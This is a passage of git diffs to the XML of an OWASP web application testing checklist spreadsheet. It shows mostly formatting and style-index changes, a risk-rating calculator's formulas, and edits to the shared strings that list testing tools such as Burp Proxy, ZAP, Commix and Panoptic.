         <f>IF(AND($B16&gt;=3,$B16&lt;6),"-&gt;Moderate&lt;-","Moderate")</f>
         <v>Moderate</v>
@@ -7273,7 +7229,7 @@
       </c>
       <c r="F25" s="15"/>
     </row>
-    <row r="26" spans="1:7" x14ac:dyDescent="0.2">
+    <row r="26" spans="1:7" x14ac:dyDescent="0.15">
       <c r="A26" s="11" t="str">
         <f>IF($B16&gt;=6,"-&gt;High&lt;-","High")</f>
         <v>High</v>
@@ -7294,6 +7250,12 @@
   </sheetData>
   <dataConsolidate function="varp"/>
   <mergeCells count="22">
+    <mergeCell ref="B20:D20"/>
+    <mergeCell ref="E20:F20"/>
+    <mergeCell ref="B22:D22"/>
+    <mergeCell ref="B12:D12"/>
+    <mergeCell ref="B13:D13"/>
+    <mergeCell ref="B14:D14"/>
     <mergeCell ref="B5:D5"/>
     <mergeCell ref="B16:D17"/>
     <mergeCell ref="G16:G17"/>
@@ -7310,12 +7272,6 @@
     <mergeCell ref="A10:D10"/>
     <mergeCell ref="F10:G10"/>
     <mergeCell ref="B11:D11"/>
-    <mergeCell ref="B20:D20"/>
-    <mergeCell ref="E20:F20"/>
-    <mergeCell ref="B22:D22"/>
-    <mergeCell ref="B12:D12"/>
-    <mergeCell ref="B13:D13"/>
-    <mergeCell ref="B14:D14"/>
   </mergeCells>
   <phoneticPr fontId="5" type="noConversion"/>
   <conditionalFormatting sqref="E20:F20">
@@ -7430,27 +7386,27 @@
       <selection activeCell="M12" sqref="M12"/>
     </sheetView>
   </sheetViews>
-  <sheetFormatPr defaultRowHeight="12.75" x14ac:dyDescent="0.2"/>
+  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="13" x14ac:dyDescent="0.15"/>
   <cols>
     <col min="1" max="1" width="39" bestFit="1" customWidth="1"/>
     <col min="2" max="2" width="2" bestFit="1" customWidth="1"/>
-    <col min="3" max="3" width="32.7109375" bestFit="1" customWidth="1"/>
+    <col min="3" max="3" width="32.6640625" bestFit="1" customWidth="1"/>
     <col min="4" max="4" width="2" bestFit="1" customWidth="1"/>
-    <col min="5" max="5" width="43.28515625" bestFit="1" customWidth="1"/>
+    <col min="5" max="5" width="43.33203125" bestFit="1" customWidth="1"/>
     <col min="6" max="6" width="2" bestFit="1" customWidth="1"/>
-    <col min="7" max="7" width="38.42578125" bestFit="1" customWidth="1"/>
+    <col min="7" max="7" width="38.5" bestFit="1" customWidth="1"/>
     <col min="8" max="8" width="2" bestFit="1" customWidth="1"/>
-    <col min="9" max="9" width="38.5703125" bestFit="1" customWidth="1"/>
+    <col min="9" max="9" width="38.5" bestFit="1" customWidth="1"/>
     <col min="10" max="10" width="2" bestFit="1" customWidth="1"/>
-    <col min="11" max="11" width="27.7109375" bestFit="1" customWidth="1"/>
+    <col min="11" max="11" width="27.6640625" bestFit="1" customWidth="1"/>
     <col min="12" max="12" width="2" bestFit="1" customWidth="1"/>
     <col min="13" max="13" width="23" bestFit="1" customWidth="1"/>
     <col min="14" max="14" width="2" bestFit="1" customWidth="1"/>
-    <col min="15" max="15" width="31.5703125" bestFit="1" customWidth="1"/>
+    <col min="15" max="15" width="31.5" bestFit="1" customWidth="1"/>
     <col min="16" max="16" width="2" bestFit="1" customWidth="1"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:16" ht="15" x14ac:dyDescent="0.2">
+    <row r="1" spans="1:16" ht="15" x14ac:dyDescent="0.15">
       <c r="A1" s="18" t="s">
         <v>15</v>
       </c>
@@ -7484,7 +7440,7 @@
       </c>
       <c r="P1" s="7"/>
     </row>
-    <row r="2" spans="1:16" x14ac:dyDescent="0.2">
+    <row r="2" spans="1:16" x14ac:dyDescent="0.15">
       <c r="A2" s="7" t="s">
         <v>53</v>
       </c>
@@ -7534,7 +7490,7 @@
         <v>54</v>
       </c>
     </row>
-    <row r="3" spans="1:16" x14ac:dyDescent="0.2">
+    <row r="3" spans="1:16" x14ac:dyDescent="0.15">
       <c r="A3" s="7" t="s">
         <v>55</v>
       </c>
@@ -7584,7 +7540,7 @@
         <v>0</v>
       </c>
     </row>
-    <row r="4" spans="1:16" x14ac:dyDescent="0.2">
+    <row r="4" spans="1:16" x14ac:dyDescent="0.15">
       <c r="A4" s="7" t="s">
         <v>57</v>
       </c>
@@ -7634,7 +7590,7 @@
         <v>1</v>
       </c>
     </row>
-    <row r="5" spans="1:16" x14ac:dyDescent="0.2">
+    <row r="5" spans="1:16" x14ac:dyDescent="0.15">
       <c r="A5" s="7" t="s">
         <v>61</v>
       </c>
@@ -7684,7 +7640,7 @@
         <v>3</v>
       </c>
     </row>
-    <row r="6" spans="1:16" x14ac:dyDescent="0.2">
+    <row r="6" spans="1:16" x14ac:dyDescent="0.15">
       <c r="A6" s="7" t="s">
         <v>16</v>
       </c>
@@ -7734,7 +7690,7 @@
         <v>8</v>
       </c>
     </row>
-    <row r="7" spans="1:16" x14ac:dyDescent="0.2">
+    <row r="7" spans="1:16" x14ac:dyDescent="0.15">
       <c r="A7" s="7" t="s">
         <v>73</v>
       </c>
@@ -7776,7 +7732,7 @@
         <v>9</v>
       </c>
     </row>
-    <row r="8" spans="1:16" x14ac:dyDescent="0.2">
+    <row r="8" spans="1:16" x14ac:dyDescent="0.15">
       <c r="A8" s="7" t="s">
         <v>78</v>
       </c>
@@ -7802,7 +7758,7 @@
       <c r="O8" s="7"/>
       <c r="P8" s="7"/>
     </row>
-    <row r="10" spans="1:16" ht="15" x14ac:dyDescent="0.25">
+    <row r="10" spans="1:16" ht="15" x14ac:dyDescent="0.2">
       <c r="A10" s="18" t="s">
         <v>17</v>
       </c>
@@ -7836,7 +7792,7 @@
       </c>
       <c r="P10" s="9"/>
     </row>
-    <row r="11" spans="1:16" x14ac:dyDescent="0.2">
+    <row r="11" spans="1:16" x14ac:dyDescent="0.15">
       <c r="A11" s="7" t="s">
         <v>53</v>
       </c>
@@ -7886,7 +7842,7 @@
         <v>54</v>
       </c>
     </row>
-    <row r="12" spans="1:16" x14ac:dyDescent="0.2">
+    <row r="12" spans="1:16" x14ac:dyDescent="0.15">
       <c r="A12" s="7" t="s">
         <v>55</v>
       </c>
@@ -7936,7 +7892,7 @@
         <v>0</v>
       </c>
     </row>
-    <row r="13" spans="1:16" x14ac:dyDescent="0.2">
+    <row r="13" spans="1:16" x14ac:dyDescent="0.15">
       <c r="A13" s="7" t="s">
         <v>80</v>
       </c>
@@ -7986,7 +7942,7 @@
         <v>3</v>
       </c>
     </row>
-    <row r="14" spans="1:16" x14ac:dyDescent="0.2">
+    <row r="14" spans="1:16" x14ac:dyDescent="0.15">
       <c r="A14" s="7" t="s">
         <v>18</v>
       </c>
@@ -8036,7 +7992,7 @@
         <v>5</v>
       </c>
     </row>
-    <row r="15" spans="1:16" x14ac:dyDescent="0.2">
+    <row r="15" spans="1:16" x14ac:dyDescent="0.15">
       <c r="A15" s="7" t="s">
         <v>94</v>
       </c>
@@ -8086,7 +8042,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="16" spans="1:16" x14ac:dyDescent="0.2">
+    <row r="16" spans="1:16" x14ac:dyDescent="0.15">
       <c r="A16" s="7" t="s">
         <v>99</v>
       </c>
@@ -8128,7 +8084,7 @@
         <v>9</v>
       </c>
     </row>
-    <row r="17" spans="1:15" x14ac:dyDescent="0.2">
+    <row r="17" spans="1:15" x14ac:dyDescent="0.15">
       <c r="A17" s="7"/>
       <c r="B17" s="7"/>
       <c r="C17" s="7" t="s">

--- a/OWASPv4_Checklist.xlsx
+++ b/OWASPv4_Checklist.xlsx
@@ -284,7 +284,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="745" uniqueCount="464">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="745" uniqueCount="465">
   <si>
     <t>Information Gathering</t>
   </si>
@@ -1730,9 +1730,6 @@
     <t>Burp Proxy (SQLipy), SQLMap, Pangolin, Seclists (FuzzDB)</t>
   </si>
   <si>
-    <t>Burp Proxy, ZAP, Liffy</t>
-  </si>
-  <si>
     <t>Burp Proxy, fimap, Liffy</t>
   </si>
   <si>
@@ -1743,6 +1740,12 @@
   </si>
   <si>
     <t>Burp Proxy (csrf_token_detect), burpy, ZAP</t>
+  </si>
+  <si>
+    <t>Burp Proxy, ZAP, Commix</t>
+  </si>
+  <si>
+    <t>Burp Proxy, ZAP, Liffy, Panoptic</t>
   </si>
 </sst>
 </file>
@@ -2164,6 +2167,18 @@
     <xf numFmtId="0" fontId="22" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center" wrapText="1"/>
     </xf>
+    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
+      <alignment horizontal="right"/>
+    </xf>
+    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
+      <alignment horizontal="left"/>
+    </xf>
+    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
+      <alignment horizontal="left"/>
+    </xf>
+    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
+      <alignment horizontal="left" vertical="center" wrapText="1"/>
+    </xf>
     <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center" wrapText="1"/>
     </xf>
@@ -2188,18 +2203,6 @@
     </xf>
     <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
       <alignment vertical="center" wrapText="1"/>
-    </xf>
-    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
-      <alignment horizontal="left" vertical="center" wrapText="1"/>
-    </xf>
-    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
-      <alignment horizontal="right"/>
-    </xf>
-    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
-      <alignment horizontal="left"/>
-    </xf>
-    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
-      <alignment horizontal="left"/>
     </xf>
   </cellXfs>
   <cellStyles count="1">
@@ -4095,8 +4098,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
   <dimension ref="A1:F130"/>
   <sheetViews>
-    <sheetView showGridLines="0" tabSelected="1" workbookViewId="0">
-      <selection sqref="A1:B1"/>
+    <sheetView showGridLines="0" tabSelected="1" topLeftCell="A76" workbookViewId="0">
+      <selection activeCell="C80" sqref="C80"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="13" x14ac:dyDescent="0.15"/>
@@ -4889,7 +4892,7 @@
         <v>370</v>
       </c>
       <c r="D49" s="44" t="s">
-        <v>461</v>
+        <v>460</v>
       </c>
       <c r="E49" s="24" t="s">
         <v>123</v>
@@ -4906,7 +4909,7 @@
         <v>109</v>
       </c>
       <c r="D50" s="44" t="s">
-        <v>461</v>
+        <v>460</v>
       </c>
       <c r="E50" s="24" t="s">
         <v>123</v>
@@ -4923,7 +4926,7 @@
         <v>371</v>
       </c>
       <c r="D51" s="44" t="s">
-        <v>461</v>
+        <v>460</v>
       </c>
       <c r="E51" s="24" t="s">
         <v>123</v>
@@ -4969,7 +4972,7 @@
         <v>374</v>
       </c>
       <c r="D54" s="44" t="s">
-        <v>462</v>
+        <v>461</v>
       </c>
       <c r="E54" s="24" t="s">
         <v>123</v>
@@ -5038,7 +5041,7 @@
         <v>376</v>
       </c>
       <c r="D58" s="44" t="s">
-        <v>463</v>
+        <v>462</v>
       </c>
       <c r="E58" s="24" t="s">
         <v>123</v>
@@ -5413,7 +5416,7 @@
         <v>405</v>
       </c>
       <c r="D81" s="44" t="s">
-        <v>459</v>
+        <v>464</v>
       </c>
       <c r="E81" s="24" t="s">
         <v>123</v>
@@ -5428,7 +5431,7 @@
         <v>406</v>
       </c>
       <c r="D82" s="44" t="s">
-        <v>460</v>
+        <v>459</v>
       </c>
       <c r="E82" s="24" t="s">
         <v>123</v>
@@ -5444,7 +5447,7 @@
         <v>407</v>
       </c>
       <c r="D83" s="44" t="s">
-        <v>460</v>
+        <v>459</v>
       </c>
       <c r="E83" s="24" t="s">
         <v>123</v>
@@ -5462,7 +5465,7 @@
         <v>408</v>
       </c>
       <c r="D84" s="44" t="s">
-        <v>442</v>
+        <v>463</v>
       </c>
       <c r="E84" s="24" t="s">
         <v>123</v>
@@ -6865,28 +6868,28 @@
   </cols>
   <sheetData>
     <row r="1" spans="1:10" ht="21" x14ac:dyDescent="0.25">
-      <c r="A1" s="54" t="s">
+      <c r="A1" s="58" t="s">
         <v>8</v>
       </c>
-      <c r="B1" s="54"/>
-      <c r="C1" s="54"/>
-      <c r="D1" s="54"/>
-      <c r="E1" s="54"/>
-      <c r="F1" s="54"/>
-      <c r="G1" s="54"/>
+      <c r="B1" s="58"/>
+      <c r="C1" s="58"/>
+      <c r="D1" s="58"/>
+      <c r="E1" s="58"/>
+      <c r="F1" s="58"/>
+      <c r="G1" s="58"/>
     </row>
     <row r="3" spans="1:10" ht="15" x14ac:dyDescent="0.15">
-      <c r="A3" s="55" t="s">
+      <c r="A3" s="59" t="s">
         <v>9</v>
       </c>
-      <c r="B3" s="55"/>
-      <c r="C3" s="55"/>
-      <c r="D3" s="55"/>
+      <c r="B3" s="59"/>
+      <c r="C3" s="59"/>
+      <c r="D3" s="59"/>
       <c r="E3" s="2"/>
-      <c r="F3" s="55" t="s">
+      <c r="F3" s="59" t="s">
         <v>10</v>
       </c>
-      <c r="G3" s="55"/>
+      <c r="G3" s="59"/>
       <c r="I3" t="s">
         <v>11</v>
       </c>
@@ -6895,27 +6898,27 @@
       </c>
     </row>
     <row r="4" spans="1:10" ht="15" x14ac:dyDescent="0.15">
-      <c r="A4" s="56" t="s">
+      <c r="A4" s="60" t="s">
         <v>13</v>
       </c>
-      <c r="B4" s="56"/>
-      <c r="C4" s="56"/>
-      <c r="D4" s="56"/>
+      <c r="B4" s="60"/>
+      <c r="C4" s="60"/>
+      <c r="D4" s="60"/>
       <c r="E4" s="3"/>
-      <c r="F4" s="56" t="s">
+      <c r="F4" s="60" t="s">
         <v>14</v>
       </c>
-      <c r="G4" s="56"/>
+      <c r="G4" s="60"/>
     </row>
     <row r="5" spans="1:10" ht="15" x14ac:dyDescent="0.2">
       <c r="A5" s="4" t="s">
         <v>15</v>
       </c>
-      <c r="B5" s="51" t="s">
+      <c r="B5" s="55" t="s">
         <v>61</v>
       </c>
-      <c r="C5" s="52"/>
-      <c r="D5" s="52"/>
+      <c r="C5" s="56"/>
+      <c r="D5" s="56"/>
       <c r="E5" s="5">
         <f>VLOOKUP(B5,References!A2:B8,2,FALSE)</f>
         <v>3</v>
@@ -6935,11 +6938,11 @@
       <c r="A6" s="4" t="s">
         <v>19</v>
       </c>
-      <c r="B6" s="59" t="s">
+      <c r="B6" s="63" t="s">
         <v>62</v>
       </c>
-      <c r="C6" s="59"/>
-      <c r="D6" s="59"/>
+      <c r="C6" s="63"/>
+      <c r="D6" s="63"/>
       <c r="E6" s="5">
         <f>VLOOKUP(B6,References!C2:D6,2,FALSE)</f>
         <v>4</v>
@@ -6959,11 +6962,11 @@
       <c r="A7" s="4" t="s">
         <v>23</v>
       </c>
-      <c r="B7" s="59" t="s">
+      <c r="B7" s="63" t="s">
         <v>56</v>
       </c>
-      <c r="C7" s="59"/>
-      <c r="D7" s="59"/>
+      <c r="C7" s="63"/>
+      <c r="D7" s="63"/>
       <c r="E7" s="5">
         <f>VLOOKUP(B7,References!E2:F6,2,FALSE)</f>
         <v>0</v>
@@ -6983,11 +6986,11 @@
       <c r="A8" s="4" t="s">
         <v>27</v>
       </c>
-      <c r="B8" s="59" t="s">
+      <c r="B8" s="63" t="s">
         <v>28</v>
       </c>
-      <c r="C8" s="59"/>
-      <c r="D8" s="59"/>
+      <c r="C8" s="63"/>
+      <c r="D8" s="63"/>
       <c r="E8" s="5">
         <f>VLOOKUP(B8,[1]Sheet3!G2:H8,2,FALSE)</f>
         <v>2</v>
@@ -7014,28 +7017,28 @@
       <c r="H9" s="7"/>
     </row>
     <row r="10" spans="1:10" ht="15" x14ac:dyDescent="0.15">
-      <c r="A10" s="56" t="s">
+      <c r="A10" s="60" t="s">
         <v>31</v>
       </c>
-      <c r="B10" s="56"/>
-      <c r="C10" s="56"/>
-      <c r="D10" s="56"/>
+      <c r="B10" s="60"/>
+      <c r="C10" s="60"/>
+      <c r="D10" s="60"/>
       <c r="E10" s="3"/>
-      <c r="F10" s="56" t="s">
+      <c r="F10" s="60" t="s">
         <v>32</v>
       </c>
-      <c r="G10" s="56"/>
+      <c r="G10" s="60"/>
       <c r="H10" s="3"/>
     </row>
     <row r="11" spans="1:10" ht="15" x14ac:dyDescent="0.2">
       <c r="A11" s="4" t="s">
         <v>33</v>
       </c>
-      <c r="B11" s="60" t="s">
+      <c r="B11" s="54" t="s">
         <v>59</v>
       </c>
-      <c r="C11" s="60"/>
-      <c r="D11" s="60"/>
+      <c r="C11" s="54"/>
+      <c r="D11" s="54"/>
       <c r="E11" s="5">
         <f>VLOOKUP(B11,References!I2:J7,2,FALSE)</f>
         <v>1</v>
@@ -7055,11 +7058,11 @@
       <c r="A12" s="4" t="s">
         <v>37</v>
       </c>
-      <c r="B12" s="60" t="s">
+      <c r="B12" s="54" t="s">
         <v>70</v>
       </c>
-      <c r="C12" s="60"/>
-      <c r="D12" s="60"/>
+      <c r="C12" s="54"/>
+      <c r="D12" s="54"/>
       <c r="E12" s="5">
         <f>VLOOKUP(B12,References!K$2:L$7,2,FALSE)</f>
         <v>5</v>
@@ -7079,11 +7082,11 @@
       <c r="A13" s="4" t="s">
         <v>40</v>
       </c>
-      <c r="B13" s="60" t="s">
+      <c r="B13" s="54" t="s">
         <v>64</v>
       </c>
-      <c r="C13" s="60"/>
-      <c r="D13" s="60"/>
+      <c r="C13" s="54"/>
+      <c r="D13" s="54"/>
       <c r="E13" s="5">
         <f>VLOOKUP(B13,References!M$2:N$7,2,FALSE)</f>
         <v>4</v>
@@ -7103,11 +7106,11 @@
       <c r="A14" s="4" t="s">
         <v>44</v>
       </c>
-      <c r="B14" s="60" t="s">
+      <c r="B14" s="54" t="s">
         <v>65</v>
       </c>
-      <c r="C14" s="60"/>
-      <c r="D14" s="60"/>
+      <c r="C14" s="54"/>
+      <c r="D14" s="54"/>
       <c r="E14" s="5">
         <f>VLOOKUP(B14,References!O$2:P$7,2,FALSE)</f>
         <v>3</v>
@@ -7127,51 +7130,51 @@
       <c r="E15" s="4"/>
     </row>
     <row r="16" spans="1:10" ht="15" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="A16" s="57" t="s">
+      <c r="A16" s="61" t="s">
         <v>48</v>
       </c>
-      <c r="B16" s="53">
+      <c r="B16" s="57">
         <f>IFERROR(AVERAGE(E5:E8,E11:E14),"All factors require a selection.")</f>
         <v>2.75</v>
       </c>
-      <c r="C16" s="53"/>
-      <c r="D16" s="53"/>
+      <c r="C16" s="57"/>
+      <c r="D16" s="57"/>
       <c r="E16" s="4"/>
-      <c r="F16" s="58" t="s">
+      <c r="F16" s="62" t="s">
         <v>49</v>
       </c>
-      <c r="G16" s="53">
+      <c r="G16" s="57">
         <f>IFERROR(AVERAGE(H5:H8,H11:H14),"All factors require a selection.")</f>
         <v>2.625</v>
       </c>
     </row>
     <row r="17" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.15">
-      <c r="A17" s="57"/>
-      <c r="B17" s="53"/>
-      <c r="C17" s="53"/>
-      <c r="D17" s="53"/>
-      <c r="F17" s="58"/>
-      <c r="G17" s="53"/>
+      <c r="A17" s="61"/>
+      <c r="B17" s="57"/>
+      <c r="C17" s="57"/>
+      <c r="D17" s="57"/>
+      <c r="F17" s="62"/>
+      <c r="G17" s="57"/>
     </row>
     <row r="20" spans="1:7" ht="19" x14ac:dyDescent="0.25">
-      <c r="B20" s="61" t="s">
+      <c r="B20" s="51" t="s">
         <v>50</v>
       </c>
-      <c r="C20" s="61"/>
-      <c r="D20" s="61"/>
-      <c r="E20" s="62" t="str">
+      <c r="C20" s="51"/>
+      <c r="D20" s="51"/>
+      <c r="E20" s="52" t="str">
         <f>IFERROR(IF(AND($B$16&lt;3,$G$16&lt;3),"Note",IF(OR(AND($B$16&lt;3,$G$16&gt;=3,$G$16&lt;6),AND($B$16&gt;=3,$B$16&lt;6,$G$16&lt;3)),"Low",IF(OR(AND($B16&lt;3,$G16&gt;=6),AND($B16&gt;=3,$B16&lt;6,$G16&gt;=3,$G16&lt;6),AND($B16&gt;=6,$G16&lt;3)),"MODERATE",IF(OR(AND($B16&gt;=6,$B16&gt;=3,$G16&lt;6),AND($B16&gt;=3,$B16&lt;6,$G16&gt;6)),"High","Critical")))),"Note")</f>
         <v>Note</v>
       </c>
-      <c r="F20" s="62"/>
+      <c r="F20" s="52"/>
       <c r="G20" s="1"/>
     </row>
     <row r="22" spans="1:7" ht="15" x14ac:dyDescent="0.2">
-      <c r="B22" s="63" t="s">
+      <c r="B22" s="53" t="s">
         <v>51</v>
       </c>
-      <c r="C22" s="63"/>
-      <c r="D22" s="63"/>
+      <c r="C22" s="53"/>
+      <c r="D22" s="53"/>
     </row>
     <row r="23" spans="1:7" ht="15" x14ac:dyDescent="0.2">
       <c r="A23" s="9" t="s">
@@ -7250,12 +7253,6 @@
   </sheetData>
   <dataConsolidate function="varp"/>
   <mergeCells count="22">
-    <mergeCell ref="B20:D20"/>
-    <mergeCell ref="E20:F20"/>
-    <mergeCell ref="B22:D22"/>
-    <mergeCell ref="B12:D12"/>
-    <mergeCell ref="B13:D13"/>
-    <mergeCell ref="B14:D14"/>
     <mergeCell ref="B5:D5"/>
     <mergeCell ref="B16:D17"/>
     <mergeCell ref="G16:G17"/>
@@ -7272,6 +7269,12 @@
     <mergeCell ref="A10:D10"/>
     <mergeCell ref="F10:G10"/>
     <mergeCell ref="B11:D11"/>
+    <mergeCell ref="B20:D20"/>
+    <mergeCell ref="E20:F20"/>
+    <mergeCell ref="B22:D22"/>
+    <mergeCell ref="B12:D12"/>
+    <mergeCell ref="B13:D13"/>
+    <mergeCell ref="B14:D14"/>
   </mergeCells>
   <phoneticPr fontId="5" type="noConversion"/>
   <conditionalFormatting sqref="E20:F20">

--- a/OWASPv4_Checklist.xlsx
+++ b/OWASPv4_Checklist.xlsx
@@ -1,15 +1,15 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
 <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" mc:Ignorable="x15">
-  <fileVersion appName="xl" lastEdited="6" lowestEdited="4" rupBuild="26101"/>
-  <workbookPr/>
+  <fileVersion appName="xl" lastEdited="6" lowestEdited="4" rupBuild="14420"/>
+  <workbookPr defaultThemeVersion="124226"/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/prathan/Github/OWASP-Testing-Checklist/"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\GIT\OWASP-Testing-Checklist\"/>
     </mc:Choice>
   </mc:AlternateContent>
   <bookViews>
-    <workbookView xWindow="120" yWindow="460" windowWidth="22740" windowHeight="12740"/>
+    <workbookView xWindow="120" yWindow="465" windowWidth="22740" windowHeight="12735" activeTab="2"/>
   </bookViews>
   <sheets>
     <sheet name="Testing Checklist" sheetId="1" r:id="rId1"/>
@@ -17,9 +17,6 @@
     <sheet name="Risk Assessment Calculator" sheetId="2" r:id="rId3"/>
     <sheet name="References" sheetId="3" r:id="rId4"/>
   </sheets>
-  <externalReferences>
-    <externalReference r:id="rId5"/>
-  </externalReferences>
   <definedNames>
     <definedName name="Awareness">References!$M$3:$M$7</definedName>
     <definedName name="EaseofExploit">References!$K$3:$K$7</definedName>
@@ -39,7 +36,7 @@
     <definedName name="result">'Testing Checklist'!$A$128:$A$130</definedName>
     <definedName name="SkillRequired">References!$A$3:$A$8</definedName>
   </definedNames>
-  <calcPr calcId="150001" concurrentCalc="0"/>
+  <calcPr calcId="152511" concurrentCalc="0"/>
   <extLst>
     <ext xmlns:mx="http://schemas.microsoft.com/office/mac/excel/2008/main" uri="{7523E5D3-25F3-A5E0-1632-64F254C22452}">
       <mx:ArchID Flags="2"/>
@@ -55,7 +52,7 @@
     <author>pphongthiproek</author>
   </authors>
   <commentList>
-    <comment ref="A5" authorId="0">
+    <comment ref="A5" authorId="0" shapeId="0">
       <text>
         <r>
           <rPr>
@@ -69,7 +66,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F5" authorId="1">
+    <comment ref="F5" authorId="1" shapeId="0">
       <text>
         <r>
           <rPr>
@@ -83,7 +80,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="A6" authorId="0">
+    <comment ref="A6" authorId="0" shapeId="0">
       <text>
         <r>
           <rPr>
@@ -97,7 +94,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F6" authorId="1">
+    <comment ref="F6" authorId="1" shapeId="0">
       <text>
         <r>
           <rPr>
@@ -111,7 +108,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="A7" authorId="1">
+    <comment ref="A7" authorId="1" shapeId="0">
       <text>
         <r>
           <rPr>
@@ -125,7 +122,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F7" authorId="1">
+    <comment ref="F7" authorId="1" shapeId="0">
       <text>
         <r>
           <rPr>
@@ -139,7 +136,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="A8" authorId="1">
+    <comment ref="A8" authorId="1" shapeId="0">
       <text>
         <r>
           <rPr>
@@ -153,7 +150,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F8" authorId="1">
+    <comment ref="F8" authorId="1" shapeId="0">
       <text>
         <r>
           <rPr>
@@ -167,7 +164,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="A11" authorId="1">
+    <comment ref="A11" authorId="1" shapeId="0">
       <text>
         <r>
           <rPr>
@@ -181,7 +178,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F11" authorId="1">
+    <comment ref="F11" authorId="1" shapeId="0">
       <text>
         <r>
           <rPr>
@@ -195,7 +192,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="A12" authorId="1">
+    <comment ref="A12" authorId="1" shapeId="0">
       <text>
         <r>
           <rPr>
@@ -209,7 +206,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F12" authorId="1">
+    <comment ref="F12" authorId="1" shapeId="0">
       <text>
         <r>
           <rPr>
@@ -223,7 +220,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="A13" authorId="1">
+    <comment ref="A13" authorId="1" shapeId="0">
       <text>
         <r>
           <rPr>
@@ -237,7 +234,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F13" authorId="1">
+    <comment ref="F13" authorId="1" shapeId="0">
       <text>
         <r>
           <rPr>
@@ -251,7 +248,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="A14" authorId="1">
+    <comment ref="A14" authorId="1" shapeId="0">
       <text>
         <r>
           <rPr>
@@ -265,7 +262,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F14" authorId="1">
+    <comment ref="F14" authorId="1" shapeId="0">
       <text>
         <r>
           <rPr>
@@ -2167,18 +2164,6 @@
     <xf numFmtId="0" fontId="22" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center" wrapText="1"/>
     </xf>
-    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
-      <alignment horizontal="right"/>
-    </xf>
-    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
-      <alignment horizontal="left"/>
-    </xf>
-    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
-      <alignment horizontal="left"/>
-    </xf>
-    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
-      <alignment horizontal="left" vertical="center" wrapText="1"/>
-    </xf>
     <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center" wrapText="1"/>
     </xf>
@@ -2204,6 +2189,18 @@
     <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
       <alignment vertical="center" wrapText="1"/>
     </xf>
+    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
